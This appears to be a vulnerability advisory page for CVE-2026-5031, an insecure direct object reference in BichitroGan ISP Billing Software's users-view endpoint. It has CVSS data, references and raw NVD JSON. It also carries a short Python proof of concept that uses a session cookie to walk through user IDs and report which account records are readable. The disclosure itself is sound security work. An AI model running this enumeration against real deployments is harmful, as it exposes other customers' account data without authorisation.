CVE-2026-5031

Description

A vulnerability was found in BichitroGan ISP Billing Software 2025.3.20. Impacted is an unknown function of the file /?_route=settings/users-view/ of the component Endpoint. The manipulation of the argument ID results in improper control of resource identifiers. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

2025.3.20

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def poc_check(target_url, session_id):
    """
    PoC for CVE-2026-5031
    Demonstrates IDOR by iterating user IDs.
    """
    headers = {
        "Cookie": f"PHPSESSID={session_id}",
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
    }
    
    print(f"[*] Checking target: {target_url}")
    
    # Iterate through potential user IDs
    for user_id in range(1, 10):
        params = {"ID": user_id}
        try:
            response = requests.get(target_url, headers=headers, params=params, timeout=5)
            if response.status_code == 200 and "username" in response.text:
                print(f"[+] ID {user_id} is accessible!")
                # print(response.text) # Uncomment to see data
            else:
                print(f"[-] ID {user_id} not accessible or invalid")
        except Exception as e:
            print(f"[!] Error connecting: {e}")

if __name__ == "__main__":
    # Replace with actual target and session
    poc_check("http://target.com/?_route=settings/users-view/", "valid_session_cookie")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5031
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5031
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5031/
[4] VulDB https://vuldb.com/cve/CVE-2026-5031
[5] https://github.com/4m3rr0r/PoCVulDb/issues/15
[6] https://vuldb.com/submit/778530
[7] https://vuldb.com/vuln/353953
[8] https://vuldb.com/vuln/353953/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5031", "sourceIdentifier": "[email protected]", "published": "2026-03-29T05:15:55.957", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in BichitroGan ISP Billing Software 2025.3.20. Impacted is an unknown function of the file /?_route=settings/users-view/ of the component Endpoint. The manipulation of the argument ID results in improper control of resource identifiers. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en BichitroGan ISP Billing Software 2025.3.20. Afecta a una función desconocida del archivo /?_route=settings/users-view/ del componente Endpoint. La manipulación del argumento ID resulta en un control inadecuado de los identificadores de recursos. El ataque puede ser lanzado remotamente. El exploit ha sido hecho público y podría ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-99"}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/15", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/778530", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/353953", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/353953/cti", "source": "[email protected]"}]}}